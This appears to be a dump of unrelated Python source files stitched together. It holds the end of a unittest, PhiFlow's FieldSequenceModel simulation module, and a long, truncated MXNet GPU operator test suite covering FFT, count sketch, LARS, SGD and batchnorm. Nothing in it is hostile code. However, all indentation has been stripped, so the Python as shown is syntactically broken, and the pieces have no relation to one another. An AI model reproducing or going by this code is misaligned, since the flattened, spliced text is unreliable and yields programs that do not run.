self.assertEqual(format(test_type.CONVERT_STR_TEST_1), 'hello')
if __name__ == '__main__':
unittest.main()
|
model.py
|
# coding=utf-8
from __future__ import print_function
import logging, os, numbers, six, numpy, threading, inspect, time
from os.path import isfile
import PDE_Control.legacy.phi.fluidformat, phi.math.nd
from PDE_Control.legacy.phi.viz.plot import PlotlyFigureBuilder
def synchronized_method(method):
outer_lock = threading.Lock()
lock_name = "__" + method.__name__ + "_lock" + "__"
def sync_method(self, *args, **kws):
with outer_lock:
if not hasattr(self, lock_name): setattr(self, lock_name, threading.Lock())
lock = getattr(self, lock_name)
with lock:
return method(self, *args, **kws)
return sync_method
class TimeDependentField(object):
def __init__(self, name, generator):
self.name = name
self.generator = generator
self.array = None
self.invalidation_version = -1
@synchronized_method
def get(self, invalidation_version):
if invalidation_version != self.invalidation_version:
self.array = self.generator()
self.invalidation_version = invalidation_version
return self.array
class FieldSequenceModel(object):
def __init__(self,
name="Φ-*flow* Application",
subtitle="Interactive demo based on PhiFlow",
fields=None,
stride=1,
record_images=False, record_data=False,
base_dir=os.path.expanduser(os.path.join("~", "model")),
recorded_fields=None,
summary=None,
custom_properties=None,
target_scene=None,
objects_to_save=None):
self.name = name
self.subtitle = subtitle
self.summary = summary if summary else name
if fields:
self.fields = {name: TimeDependentField(name, generator) for (name,generator) in fields.items()}
else:
self.fields = {}
self.message = None
self.time = 0
self._invalidation_counter = 0
self.print_to_console = True
self._controls = []
self._actions = []
self._traits = []
self.prepared = False
self.current_action = None
self._pause = False
# Setup directory & Logging
self.objects_to_save = [ self.__class__ ] if objects_to_save is None else list(objects_to_save)
self.base_dir = os.path.expanduser(base_dir)
if not target_scene:
self.new_scene()
self.uses_existing_scene = False
else:
self.scene = target_scene
self.uses_existing_scene = True
if not isfile(self.scene.subpath("info.log")):
logfile = self.scene.subpath("info.log")
else:
index = 2
while True:
logfile = self.scene.subpath("info_%d.log"%index)
if not isfile(logfile): break
else: index += 1
logging.basicConfig(filename=logfile, level=logging.INFO, format="%(message)s (%(levelname)s), %(asctime)sn\n")
print("Scene directory is %s" % self.scene.path)
# Recording
self.record_images = record_images
self.record_data = record_data
self.recorded_fields = recorded_fields if recorded_fields is not None else []
self.rec_all_slices = False
self.sequence_stride = stride
self._custom_properties = custom_properties if custom_properties else {}
self.figures = PlotlyFigureBuilder()
self._simulation = None
self.info("Setting up model...")
def new_scene(self):
self.scene = phi.fluidformat.new_scene(self.base_dir, self.scene_summary(), mkdir=True)
@property
def sim(self):
return self._simulation
@sim.setter
def sim(self, sim):
self._simulation = sim
def set_simulation(self, sim):
self.sim = sim
@property
def directory(self):
return self.scene.path
@property
def image_dir(self):
return self.scene.subpath("images")
def get_image_dir(self):
return self.scene.subpath("images", create=True)
def progress(self):
self.time += 1
self.step()
self.invalidate()
def invalidate(self):
self._invalidation_counter += 1
def step(self):
self.info("Implement step(self) to have something happen")
@property
def fieldnames(self):
return sorted(self.fields.keys())
def get_field(self, fieldname):
if not fieldname in self.fields:
raise KeyError("Field %s not declared. Available fields are %s" % (fieldname, self.fields.keys()))
return self.fields[fieldname].get(self._invalidation_counter)
def add_field(self, name, generator):
assert not self.prepared, "Cannot add fields to a prepared model"
self.fields[name] = TimeDependentField(name, generator)
@property
def actions(self):
return self._actions
def add_action(self, name, methodcall):
self._actions.append(Action(name, methodcall, name))
def run_action(self, action):
message_before = self.message
action.method()
self.invalidate()
message_after = self.message
if message_before == message_after:
if self.message is None or self.message == "":
self.message = display_name(action.name)
else:
self.message += " | " + display_name(action.name)
@property
def traits(self):
return self._traits
def add_trait(self, trait):
assert not self.prepared, "Cannot add traits to a prepared model"
self._traits.append(trait)
@property
def controls(self):
return self._controls
def prepare(self):
if self.prepared:
return
logging.info("Gathering model data...")
self.prepared = True
# Controls
for name in dir(self):
val = getattr(self, name)
editable_value = None
if isinstance(val, EditableValue):
editable_value = val
setattr(self, name, val.initial_value) # Replace EditableValue with initial value
elif name.startswith("value_"):
value_name = display_name(name[6:])
dtype = type(val)
if dtype == bool:
editable_value = EditableBool(value_name, val)
elif isinstance(val, numbers.Integral): # Int
editable_value = EditableInt(value_name, val)
elif isinstance(val, numbers.Number): # Float
editable_value = EditableFloat(value_name, val)
elif isinstance(val, six.string_types):
editable_value = EditableString(value_name, val)
if editable_value:
self._controls.append(Control(self, name, editable_value))
# Actions
for method_name in dir(self):
if method_name.startswith("action_") and callable(getattr(self, method_name)):
self._actions.append(Action(display_name(method_name[7:]), getattr(self, method_name), method_name))
# Scene
self._update_scene_properties()
source_files_to_save = set()
for object in self.objects_to_save:
source_files_to_save.add(inspect.getabsfile(object))
for source_file in source_files_to_save:
self.scene.copy_src(source_file)
def add_custom_property(self, key, value):
self._custom_properties[key] = value
if self.prepared: self._update_scene_properties()
def add_custom_properties(self, dict):
self._custom_properties.update(dict)
if self.prepared: self._update_scene_properties()
def _update_scene_properties(self):
if self.uses_existing_scene: return
app_name = inspect.getfile(self.__class__)
app_path = inspect.getabsfile(self.__class__)
properties = {
"instigator": "FieldSequenceModel",
"traits": self.traits,
"app": str(app_name),
"app_path": str(app_path),
"name": self.name,
"description": self.subtitle,
"all_fields": self.fieldnames,
"actions": [action.name for action in self.actions],
"controls": [{control.name: control.value} for control in self.controls],
"summary": self.scene_summary(),
"time_of_writing": self.time,
}
if self._simulation:
properties.update(self._simulation.as_dict())
properties.update(self.custom_properties())
self.scene.properties = properties
def settings_str(self):
return "".join([
" " + str(control) for control in self.controls
])
def custom_properties(self):
return self._custom_properties
def info(self, message):
if isinstance(message, int):
self.time = message
else:
self.message = message
if self.print_to_console:
print(str(self.time)+": "+message)
logging.info(message)
def debug(self, message):
logging.info(message)
def scene_summary(self):
return self.summary
def list_controls(self, names):
return
def show(self, *args, **kwargs):
from phi.viz.dash_gui import DashFieldSequenceGui
gui = DashFieldSequenceGui(self, *args, **kwargs)
return gui.show()
@property
def status(self):
pausing = "/Pausing" if self._pause and self.current_action else ""
action = self.current_action if self.current_action else "Idle"
message = (" - %s"%self.message) if self.message else ""
return "{}{} ({}){}".format(action, pausing, self.time, message)
def run_step(self, framerate=None, allow_recording=True):
try:
self.current_action = "Running"
starttime = time.time()
self.progress()
if allow_recording and self.time % self.sequence_stride == 0:
self.record_frame()
if framerate is not None:
duration = time.time() - starttime
rest = 1.0/framerate/self.sequence_stride - duration
if rest > 0:
self.current_action = "Waiting"
time.sleep(rest)
finally:
self.current_action = None
def play(self, max_steps=None, callback=None, framerate=None, allow_recording=True):
def target():
self._pause = False
step_count = 0
while not self._pause:
self.run_step(framerate=framerate, allow_recording=allow_recording)
step_count += 1
if max_steps and step_count >= max_steps:
break
if callback is not None:
callback()
thread = threading.Thread(target=target)
thread.start()
return self
def pause(self):
self._pause = True
@property
def running(self):
return self.current_action is not None
def record_frame(self):
self.current_action = "Recording"
files = []
if self.record_images:
os.path.isdir(self.image_dir) or os.makedirs(self.image_dir)
arrays = [self.get_field(field) for field in self.recorded_fields]
for name, array in zip(self.recorded_fields, arrays):
files += self.figures.save_figures(self.image_dir, name, self.time, array)
if self.record_data:
arrays = [self.get_field(field) for field in self.recorded_fields]
arrays = [a.staggered if isinstance(a, phi.math.nd.StaggeredGrid) else a for a in arrays]
files += phi.fluidformat.write_sim_frame(self.directory, arrays, self.recorded_fields, self.time)
if files:
self.message = "Frame written to %s" % files
self.current_action = None
def benchmark(self, sequence_count):
self._pause = False
step_count = 0
starttime = time.time()
for i in range(sequence_count):
self.run_step(framerate=None, allow_recording=False)
step_count += 1
if self._pause: break
time_elapsed = time.time() - starttime
return step_count, time_elapsed
def config_recording(self, images, data, fields):
self.record_images = images
self.record_data = data
self.recorded_fields = fields
class EditableValue(object):
def __init__(self, name, type, initial_value, category, minmax, is_linear):
self.name = name
self.type = type
self.initial_value = initial_value
self.category = category
self.minmax = minmax
self.is_linear = is_linear
@property
def min_value(self):
return self.minmax[0]
@property
def max_value(self):
return self.minmax[1]
class EditableFloat(EditableValue):
def __init__(self, name, initial_value, minmax=None, category=None, log_scale=None):
if minmax is not None:
assert len(minmax) == 2, "minmax must be pair (min, max)"
if log_scale is None:
if minmax is None:
log_scale = True
else:
log_scale = minmax[1] / float(minmax[0]) > 10
if not minmax:
if log_scale:
magn = numpy.log10(initial_value)
minmax = (10.0**(magn-3.2), 10.0**(magn+2.2))
else:
if initial_value == 0.0:
minmax = (-10.0, 10.0)
elif initial_value > 0:
minmax = (0., 4. * initial_value)
else:
minmax = (2. * initial_value, -2. * initial_value)
else:
minmax = (float(minmax[0]), float(minmax[1]))
EditableValue.__init__(self, name, "float", initial_value, category, minmax, not log_scale)
@property
def use_log_scale(self):
return not self.is_linear
class EditableInt(EditableValue):
def __init__(self, name, initial_value, minmax=None, category=None):
if not minmax:
if initial_value == 0:
minmax = (-10, 10)
elif initial_value > 0:
minmax = (0, 4*initial_value)
else:
minmax = (2 * initial_value, -2 * initial_value)
EditableValue.__init__(self, name, "int", initial_value, category, minmax, True)
class EditableBool(EditableValue):
def __init__(self, name, initial_value, category=None):
EditableValue.__init__(self, name, "bool", initial_value, category, (False, True), True)
class EditableString(EditableValue):
def __init__(self, name, initial_value, category=None, rows=20):
EditableValue.__init__(self, name, "text", initial_value, category, ("", "A"*rows), True)
@property
def rows(self):
return len(self.max_value)
class Control(object):
def __init__(self, model, attribute_name, editable_value):
self.model = model
self.attribute_name = attribute_name
self.editable_value = editable_value
@property
def value(self):
val = getattr(self.model, self.attribute_name)
if isinstance(val, numpy.float32):
return float(val)
if isinstance(val, numpy.float64):
return float(val)
return val
@value.setter
def value(self, value):
setattr(self.model, self.attribute_name, value)
self.model.invalidate()
@property
def name(self):
return self.editable_value.name
@property
def type(self):
return self.editable_value.type
@property
def id(self):
return self.attribute_name
def __str__(self):
return self.name + "_" + str(self.value)
@property
def range(self):
return self.editable_value.minmax
class Action(object):
def __init__(self, name, method, id):
self.name = name
self.method = method
self.method_name = id
@property
def id(self):
return self.method_name
def display_name(python_name):
n = list(python_name)
n[0] = n[0].upper()
for i in range(1,len(n)):
if n[i] == "_":
n[i] = " "
if len(n) > i+1:
n[i+1] = n[i+1].upper()
return "".join(n)
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import mxnet as mx
import numpy as np
import pytest
import itertools
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose
from mxnet.test_utils import check_symbolic_forward, check_symbolic_backward, discard_stderr
from mxnet.test_utils import default_context, rand_shape_2d, rand_ndarray, same, environment
from mxnet.base import MXNetError
from mxnet import autograd
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied
from common import run_in_spawned_process
from test_operator import check_sequence_reverse, allclose_function
from test_operator import *
from test_numpy_ndarray import *
from test_numpy_op import *
from test_numpy_interoperability import *
from test_gluon_probability_v1 import *
from test_gluon_probability_v2 import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_gluon_gpu import _test_bulking
from test_contrib_operator import test_multibox_target_op
from test_contrib_optimizer import test_adamw
del test_custom_op_fork #noqa
set_default_context(mx.gpu(0))
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym._simple_bind(**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
def _make_ndarrays(input_list, ctx=mx.gpu(0)):
return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list]
def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2):
values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes]
mx_vals = _make_ndarrays(values_arr, ctx=ctx)
sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
# checks that operator is deterministic
assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy())
ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1)
@with_seed()
@pytest.mark.serial
def test_multi_sum_sq():
min_nparam = 100
max_nparam = 120
min_dim = 50000
max_dim = 100000
max_ndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.gpu(0)]:
for dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)]
low_tol = ctx == mx.cpu(0) and ('float16'in [dtype])
tol1 = 1e-3 if low_tol else 1e-5
tol2 = 1e-6 if low_tol else 1e-7
check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2)
def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2):
weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes]
lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100.
wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000.
eta = (np.random.rand() + 0.1)
eps = (np.random.rand() + 0.1) / 10000.
mx_w = _make_ndarrays(weights_arr, ctx=ctx)
mx_g = _make_ndarrays(grads_arr, ctx=ctx)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx)
w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes))
g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes))
ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr],
dtype='float32', ctx=ctx)
ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
rescale_grad = (np.random.rand() + 0.5) * 100.
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps,
rescale_grad=rescale_grad)
ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq)
ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad)
ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx)
for i in range(ref_w_l2norm.size):
_w = ref_w_l2norm[i]
_g = ref_g_l2norm[i]
if _w > 0.0 and _g > 0.0:
ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps)
else:
ref_new_lrs[i] = lrs[i]
assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2)
@with_seed()
@pytest.mark.serial
def test_fast_lars():
min_nparam = 50
max_nparam = 60
maxdim = 10000
maxndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.cpu(0), mx.gpu(0)]:
for w_dtype in dtypes:
for g_dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
lowTol = ctx == mx.cpu(0) and ('float16'in [w_dtype, g_dtype])
tol1 = 1e-3 if lowTol else 1e-5
tol2 = 1e-6 if lowTol else 1e-7
check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2)
def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights):
def _flatten_list(nested_list):
return [item for sublist in nested_list for item in sublist]
weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
rescale_grad = (np.random.random() + 1.0)
mx_w = _make_ndarrays(weights_arr)
mx_g = _make_ndarrays(grads_arr)
mx_p_w = _make_ndarrays(weights_arr)
mx_p_g = _make_ndarrays(grads_arr)
lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0))
wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0))
if use_master_weights:
weights32_arr = [arr.astype('float32') for arr in weights_arr]
mx_w32 = _make_ndarrays(weights32_arr)
mx_p_w32 = _make_ndarrays(weights32_arr)
if momentum is None:
if use_master_weights:
mx.nd.multi_mp_sgd_update(
*_flatten_list(zip(mx_w, mx_g, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
mx.nd.preloaded_multi_mp_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
out = mx.nd.multi_sgd_update(
*_flatten_list(zip(mx_w, mx_g)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
if use_master_weights:
momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
out = mx.nd.multi_mp_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
else:
momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
mx.nd.multi_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
mx.nd.preloaded_multi_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol):
for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)):
assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol)
if dtype == 'float16':
rtol = 1e-3
atol = 1e-2
else:
rtol = 1e-5
atol = 1e-6
_assert_all_almost_equal(mx_p_w, mx_w, rtol, atol)
if momentum is not None:
_assert_all_almost_equal(mx_p_m, mx_m, rtol, atol)
if use_master_weights:
_assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6)
@with_seed()
def test_preloaded_multi_sgd():
dtypes = ['float16', 'float32']
momentums = [None, 0.9]
min_nparam = 5
max_nparam = 10
maxdim = 6
maxndim = 4
for dtype in dtypes:
use_master_weights_list = [False,] if dtype == 'float32' else [True, False]
for use_master_weights in use_master_weights_list:
for momentum in momentums:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights)
@with_seed()
@pytest.mark.serial
def test_batchnorm_with_type():
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V2, 2D
bools = [False, True]
for fix_gamma, cudnn_off in itertools.product(bools, bools):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
for fix_gamma, cudnn_off in itertools.product(bools, bools):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_1D)
# V2, 3D
for fix_gamma, cudnn_off in itertools.product(bools, [True,]):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
@pytest.mark.serial
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
